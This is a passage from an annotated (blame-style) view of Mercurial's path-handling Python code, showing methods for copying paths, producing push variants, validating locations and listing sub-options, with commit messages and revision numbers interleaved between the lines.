if new_copy is not None:
v = new_copy()
new.__dict__[k] = v
path: allow to copy a path while adjusting the url...
r50651 if new_raw_location is not None:
new._setup_url(new_raw_location)
urlutil: add a `copy` method to `path...
r47956 return new
path: add a method to retrieve a "push variant" of a path...
r50591 @property
def is_push_variant(self):
"""is this a path variant to be used for pushing"""
return self.main_path is not None
def get_push_variant(self):
"""get a "copy" of the path, but suitable for pushing
This means using the value of the `pushurl` option (if any) as the url.
The original path is available in the `main_path` attribute.
"""
if self.main_path:
return self
new = self.copy()
new.main_path = self
path: deprecated the `pushloc` attribute...
r50601 if self._pushloc:
new._setup_url(self._pushloc)
path: add a method to retrieve a "push variant" of a path...
r50591 return new
urlutil: extract `path` related code into a new module...
r47668 def _validate_path(self):
# When given a raw location but not a symbolic name, validate the
# location is valid.
if (
not self.name
and not self.url.scheme
and not self._isvalidlocalpath(self.loc)
):
raise ValueError(
b'location is not a URL or path to a local '
b'repo: %s' % self.rawloc
)
def _apply_suboptions(self, ui, sub_options):
# Now process the sub-options. If a sub-option is registered, its
# attribute will always be present. The value will be None if there
# was no valid sub-option.
Gregory Szorc
global: bulk replace simple pycompat.iteritems(x) with x.items()...
r49768 for suboption, (attr, func) in _pathsuboptions.items():
urlutil: extract `path` related code into a new module...
r47668 if suboption not in sub_options:
setattr(self, attr, None)
continue
value = func(ui, self, sub_options[suboption])
setattr(self, attr, value)
def _isvalidlocalpath(self, path):
"""Returns True if the given path is a potentially valid repository.
This is its own function so that extensions can change the definition of
'valid' in this case (like when pulling from a git repo into a hg
one)."""
try:
return os.path.isdir(os.path.join(path, b'.hg'))
# Python 2 may return TypeError. Python 3, ValueError.
except (TypeError, ValueError):
return False
@property
def suboptions(self):
"""Return sub-options and their values for this path.
This is intended to be used for presentation purposes.
"""
d = {}
Gregory Szorc
global: bulk replace simple pycompat.iteritems(x) with x.items()...
r49768 for subopt, (attr, _func) in _pathsuboptions.items():
urlutil: extract `path` related code into a new module...
r47668 value = getattr(self, attr)
if value is not None:
d[subopt] = value
return d